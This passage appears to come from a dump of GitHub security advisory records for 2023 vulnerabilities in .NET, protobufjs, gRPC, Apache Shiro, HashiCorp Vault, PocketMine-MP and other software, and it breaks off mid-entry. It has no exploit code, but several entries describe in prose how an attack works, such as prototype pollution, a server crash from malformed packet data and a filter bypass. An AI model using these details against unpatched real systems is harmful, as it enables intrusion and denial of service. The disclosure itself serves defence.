[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64) | >= 6.0.0, <= 6.0.19 | 6.0.20
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64) | >= 6.0.0, <= 6.0.19 | 6.0.20
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86) | >= 6.0.0, <= 6.0.19 | 6.0.20
## Advisory FAQ
### <a name="how-affected"></a>How do I know if I am affected?
If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.
### <a name="how-fix"></a>How do I fix the issue?
* To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
* If you are using one of the affected packages, please update to the patched version listed above.
* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;
```
.NET Core SDK (reflecting any global.json):
Version: 6.0.300
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 6.0.5
Commit: 8473146e7d
.NET Core SDKs installed:
6.0.300 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
```
* If you're using .NET 7.0, you should download and install Runtime 7.0.8 or SDK 7.0.109 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.
* If you're using .NET 6.0, you should download and install Runtime 6.0.19 or SDK 6.0.315 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0.
.NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.
Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.
Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
## Other Information
### Reporting Security Issues
If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <https://aka.ms/corebounty>.
### Support
You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.
### Disclaimer
The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
### External Links
[CVE-2023-33127]( https://www.cve.org/CVERecord?id=CVE-2023-33127)
### Revisions
V1.0 (July 11, 2023): Advisory published.
_Version 1.0_
_Last Updated 2023-07-11_
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-485r-rp8v-998v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33127'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/263'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33127'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:45:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-w33c-445m-f8w7
|
2023-07-13T17:01:48Z
|
2023-07-12T21:30:50Z
| null |
['CVE-2023-3635']
|
Okio Signed to Unsigned Conversion Error vulnerability
|
GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.squareup.okio:okio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3635'}, {'type': 'WEB', 'url': 'https://github.com/square/okio/commit/81bce1a30af244550b0324597720e4799281da7b'}, {'type': 'PACKAGE', 'url': 'https://github.com/square/okio'}, {'type': 'WEB', 'url': 'https://research.jfrog.com/vulnerabilities/okio-gzip-source-unhandled-exception-dos-xray-523195/'}]
|
{'cwe_ids': ['CWE-195', 'CWE-681'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-13T17:01:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-h755-8qp9-cq85
|
2023-08-15T21:16:36Z
|
2023-07-05T15:30:24Z
| null |
['CVE-2023-36665']
|
protobufjs Prototype Pollution vulnerability
|
protobuf.js (aka protobufjs) 6.10.0 until 6.11.4 and 7.0.0 until 7.2.4 allows Prototype Pollution, a different vulnerability than CVE-2022-25878. A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty. NOTE: this CVE Record is about `Object.constructor.prototype.<new-property> = ...;` whereas CVE-2022-25878 was about `Object.__proto__.<new-property> = ...;` instead.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'protobufjs'}, 'ecosystem_specific': {'affected_functions': ['protobufjs.util.setProperty']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.2.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'protobufjs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.10.0'}, {'fixed': '6.11.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36665'}, {'type': 'WEB', 'url': 'https://github.com/protobufjs/protobuf.js/pull/1899'}, {'type': 'WEB', 'url': 'https://github.com/protobufjs/protobuf.js/commit/e66379f451b0393c27d87b37fa7d271619e16b0d'}, {'type': 'PACKAGE', 'url': 'https://github.com/protobufjs/protobuf.js'}, {'type': 'WEB', 'url': 'https://github.com/protobufjs/protobuf.js/commits/release-6.11.4'}, {'type': 'WEB', 'url': 'https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.2.3...protobufjs-v7.2.4'}, {'type': 'WEB', 'url': 'https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.2.4'}, {'type': 'WEB', 'url': 'https://www.code-intelligence.com/blog/cve-protobufjs-prototype-pollution-cve-2023-36665'}]
|
{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-07T20:19:02Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-fx3v-4w3w-wpwr
|
2023-08-03T19:39:11Z
|
2023-07-28T15:30:23Z
| null |
['CVE-2023-39021']
|
Code injection in wix-embedded-mysql
|
wix-embedded-mysql v4.6.2 and below was discovered to contain a code injection vulnerability in the component com.wix.mysql.distribution.Setup.apply. This vulnerability is exploited via passing an unchecked argument.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.wix:wix-embedded-mysql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.6.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39021'}, {'type': 'WEB', 'url': 'https://github.com/LetianYuan/My-CVE-Public-References/tree/main/com_wix_wix-embedded-mysql'}, {'type': 'PACKAGE', 'url': 'https://github.com/wix/wix-embedded-mysql'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T20:46:52Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-cfgp-2977-2fmm
|
2023-07-14T05:12:24Z
|
2023-07-05T19:12:51Z
| null |
['CVE-2023-32731']
|
Connection confusion in gRPC
|
When gRPC HTTP2 stack raised a header size exceeded error, it skipped parsing the rest of the HPACK frame. This caused any HPACK table mutations to also be skipped, resulting in a desynchronization of HPACK tables between sender and receiver. If leveraged, say, between a proxy and a backend, this could lead to requests from the proxy being interpreted as containing headers from different proxy clients - leading to an information leak that can be used for privilege escalation or data exfiltration. We recommend upgrading beyond the commit contained in https://github.com/grpc/grpc/pull/32309
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.grpc:grpc-protobuf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.53.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'grpcio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.53.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'grpc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.53.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32731'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc/issues/33463'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc/pull/32309'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc/pull/33005'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/grpc/CVE-2023-32731.yml'}]
|
{'cwe_ids': ['CWE-440'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T20:26:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7wrv-6h42-w54f
|
2023-07-14T21:50:42Z
|
2023-07-14T21:50:42Z
| null |
[]
|
PocketMine-MP vulnerable to server crash using badly formatted sign NBT in BlockActorDataPacket
|
### Summary
A player sending a packet can cause the server to crash by providing incorrect sign data in NBT in `BlockActorDataPacket`.
### Details
This vulnerability was discovered using the `BlockActorDataPacket`, but other packets may also be affected. The player would seem to just need to send an NBT with an incorrect type to throw this error.
```
[Server thread/CRITICAL]: pocketmine\nbt\UnexpectedTagTypeException: "Expected a tag of type pocketmine\nbt\tag\CompoundTag, got pocketmine\nbt\tag\ByteTag" (EXCEPTION) in "pmsrc/vendor/pocketmine/nbt/src/tag/CompoundTag" at line 107
--- Stack trace ---
#0 pmsrc/src/network/mcpe/handler/InGamePacketHandler(751): pocketmine\nbt\tag\CompoundTag->getCompoundTag(string[9] FrontText)
#1 pmsrc/vendor/pocketmine/bedrock-protocol/src/BlockActorDataPacket(50): pocketmine\network\mcpe\handler\InGamePacketHandler->handleBlockActorData(object pocketmine\network\mcpe\protocol\BlockActorDataPacket#220241)
#2 pmsrc/src/network/mcpe/NetworkSession(433): pocketmine\network\mcpe\protocol\BlockActorDataPacket->handle(object pocketmine\network\mcpe\handler\InGamePacketHandler#190572)
```
### PoC
Use a bot or proxy to send a packet when editing a sign. This packet should contain an NBT with incorrect types but correct architecture.
### Impact
This makes it possible to shutdown a server for someone who knows how to operate it. As this was discovered in 4.22.1, everyone with at least this version is affected.
### Patches
This bug was fixed by 0c250a2ef09627b48aa52302f6cc7e1f2afb70ea in the 4.22.3 and 5.2.1 releases.
### Workarounds
A plugin may be able to handle `DataPacketReceiveEvent` for `BlockActorDataPacket`, and verify that the `FrontText` tag is a `TAG_Compound`.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pocketmine/pocketmine-mp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.20.0'}, {'fixed': '4.22.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'pocketmine/pocketmine-mp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-7wrv-6h42-w54f'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/commit/0c250a2ef09627b48aa52302f6cc7e1f2afb70ea'}, {'type': 'PACKAGE', 'url': 'https://github.com/pmmp/PocketMine-MP'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:50:42Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6g2w-257v-3c9f
|
2023-07-19T10:49:18Z
|
2023-07-10T18:30:49Z
| null |
['CVE-2023-34442']
|
Apache Camel information exposure vulnerability
|
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Camel. This issue affects Apache Camel from 3.X through <=3.14.8, from 3.18.X through <=3.18.7, from 3.20.X through <= 3.20.5, from 4.X through <= 4.0.0-M3.
Users should upgrade to 3.14.9, 3.18.8, 3.20.6 or 3.21.0 and for users on Camel 4.x update to 4.0.0-RC1
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-jira'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0-M3'}, {'fixed': '3.14.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-jira'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.15.0'}, {'fixed': '3.18.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-jira'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.20.0'}, {'fixed': '3.20.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-jira'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-M1'}, {'fixed': '4.0.0-RC1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.0.0-M3'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34442'}, {'type': 'WEB', 'url': 'https://github.com/apache/camel/commit/b61d5b6be4f98b673dc977ad1bc6f004642644ab'}, {'type': 'WEB', 'url': 'https://camel.apache.org/security/CVE-2023-34442.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/camel'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/CAMEL-19421'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/x4vy2hhbltb1xrvy1g6m8hpjgj2k7wgh'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:53:06Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-pmhc-2g4f-85cg
|
2023-09-15T18:29:37Z
|
2023-07-24T21:30:39Z
| null |
['CVE-2023-34478']
|
Path Traversal in Apache Shiro
|
Apache Shiro, before 1.12.0 or 2.0.0-alpha-3, may be susceptible to a path traversal attack that results in an authentication bypass when used together with APIs or other web frameworks that route requests based on non-normalized requests.
Mitigation: Update to Apache Shiro 1.12.0+ or 2.0.0-alpha-3+
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shiro:shiro-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.12.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.shiro:shiro-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha-1'}, {'fixed': '2.0.0-alpha-3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34478'}, {'type': 'WEB', 'url': 'https://github.com/apache/shiro/commit/c3ede3f94efb442acb0795714a022c2c121d1da0'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shiro'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/mbv26onkgw9o35rldh7vmq11wpv2t2qk'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230915-0005/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/24/4'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T13:51:45Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-f7xj-rg7h-mc87
|
2023-07-13T16:49:53Z
|
2023-07-07T20:32:55Z
|
2023-07-13T16:49:53Z
|
[]
|
Stylelint has vulnerability in semver dependency
|
### Summary
Our `meow` dependency (which we use for our CLI) depended on `semver@5.7.1 `. A vulnerability in this version of `semver` was recently identified and surfaced by `npm audit`:
Regular Expression Denial of Service - https://github.com/advisories/GHSA-c2qf-rxjj-qqgw
### Details
Original post by the reporter:
"my npm audit show the report
semver <7.5.2
Severity: moderate
semver vulnerable to Regular Expression Denial of Service - https://github.com/advisories/GHSA-c2qf-rxjj-qqgw
No fix available
And my dependencies tree for semver show your package
├─┬ stylelint@15.9.0
│ └─┬ meow@9.0.0
│ └─┬ read-pkg-up@7.0.1
│ └─┬ read-pkg@5.2.0
│ └─┬ normalize-package-data@2.5.0
│ └── semver@5.7.1 deduped
I found that meow@10.x.x contains normalize-package-data@5 and I can fix this vulnerability because it uses semver@7. But I can't update meow to the new major version because your package doesn't allow it."
Update your package to use the 'meow' version >=10"
### PoC
N/A
### Impact
We anticipate the impact to be low as Stylelint is a dev tool and `meow` is only used on the CLI pathway.
---
⬇️ EDITED AFTER PUBLISHED ⬇️
### Security fix backported to older `semver` versions
The same security fix has been backported to older `semver` versions of 5.x and 6.x. See the [CVE-2022-25883](https://github.com/advisories/GHSA-c2qf-rxjj-qqgw) details.
So, you can fix this vulnerability by just updating `semver` in your project's dependency tree, instead of updating `stylelint`. For details, see the example:
`package.json`:
```json
{
"dependencies": {
"stylelint": "15.10.0"
}
}
```
Run `npm audit` (here is no alert for `semver`):
```console
$ npm ci
...
$ npm audit
...
stylelint 8.0.0 - 15.10.0
Stylelint has vulnerability in semver dependency - https://github.com/advisories/GHSA-f7xj-rg7h-mc87
fix available via `npm audit fix --force`
Will install stylelint@15.10.1, which is outside the stated dependency range
node_modules/stylelint
1 low severity vulnerability
...
$ npm ls semver
...
└─┬ stylelint@15.10.0
└─┬ meow@9.0.0
├─┬ normalize-package-data@3.0.3
│ └── semver@7.5.4
└─┬ read-pkg-up@7.0.1
└─┬ read-pkg@5.2.0
└─┬ normalize-package-data@2.5.0
└── semver@5.7.2
```
|
[]
|
[{'package': {'ecosystem': 'npm', 'name': 'stylelint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '15.10.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/stylelint/stylelint/security/advisories/GHSA-f7xj-rg7h-mc87'}, {'type': 'WEB', 'url': 'https://github.com/stylelint/stylelint/pull/7043'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-c2qf-rxjj-qqgw'}, {'type': 'PACKAGE', 'url': 'https://github.com/stylelint/stylelint'}, {'type': 'WEB', 'url': 'https://github.com/stylelint/stylelint/releases/tag/15.10.1'}]
|
{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-07T20:32:55Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9mh8-9j64-443f
|
2023-07-06T21:18:06Z
|
2023-07-06T19:24:01Z
| null |
['CVE-2022-41316']
|
HashiCorp Vault's revocation list not respected
|
HashiCorp Vault and Vault Enterprise’s TLS certificate auth method did not initially load the optionally configured CRL issued by the role's CA into memory on startup, resulting in the revocation list not being checked if the CRL has not yet been retrieved. Fixed in 1.12.0, 1.11.4, 1.10.7, and 1.9.10.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.7'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.10'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41316'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2022-24-vaults-tls-cert-auth-method-only-loaded-crl-after-first-request/45483'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:18:06Z', 'nvd_published_at': '2022-10-12T21:15:00Z'}
|
1.4.0
|
GHSA-4pvw-g9fx-594r
|
2023-08-03T17:39:56Z
|
2023-07-25T18:30:32Z
| null |
['CVE-2023-38435']
|
Cross-site Scripting in healthcheck webconsole plugin
|
An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Apache Felix Healthcheck Webconsole Plugin version 2.0.2 and prior may allow an attacker to perform a reflected cross-site scripting (XSS) attack.
Upgrade to Apache Felix Healthcheck Webconsole Plugin 2.1.0 or higher.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.felix:org.apache.felix.healthcheck.webconsoleplugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38435'}, {'type': 'WEB', 'url': 'https://github.com/apache/felix-dev/commit/c4e67520e0a4499389342491869919a6c42ed62c'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/felix-dev'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/r3blhp3onr4rdbkgdyglqnccg0v79pfv'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2023/Jul/43'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/25/10'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T01:06:54Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wmg5-g953-qqfw
|
2023-07-06T21:51:17Z
|
2023-07-06T19:24:11Z
| null |
['CVE-2023-24999']
|
Hashicorp Vault Fails to Verify if Approle SecretID Belongs to Role During a Destroy Operation
|
When using the Vault and Vault Enterprise (Vault) approle auth method, any authenticated user with access to the `/auth/approle/role/:role_name/secret-id-accessor/destroy` endpoint can destroy the secret ID of any other role by providing the secret ID accessor. This vulnerability, CVE-2023-24999, has been fixed in Vault 1.13.0, 1.12.4, 1.11.8, 1.10.11 and above.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24999'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-07-vault-fails-to-verify-if-approle-secretid-belongs-to-role-during-a-destroy-operation/51305'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:51:17Z', 'nvd_published_at': '2023-03-11T00:15:00Z'}
|
1.4.0
|
GHSA-c3rh-f2w5-fghm
|
2023-07-06T23:36:23Z
|
2023-07-06T21:14:59Z
| null |
['CVE-2023-31058']
|
Apache InLong Deserialization of Untrusted Data Vulnerability
|
Deserialization of Untrusted Data Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0. Attackers would bypass the `autoDeserialize` option filtering by adding blanks. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7674 to solve it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-pojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31058'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7674'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/bkcgbn9l61croxfyspf7xd42qb189s3z'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:36:23Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8c6x-g4fw-8rf4
|
2023-07-10T21:54:36Z
|
2023-07-10T21:54:36Z
| null |
[]
|
Whatsapp-Chat-Exporter has Cross-Site Scripting vulnerability in HTML output of chats.
|
### Impact
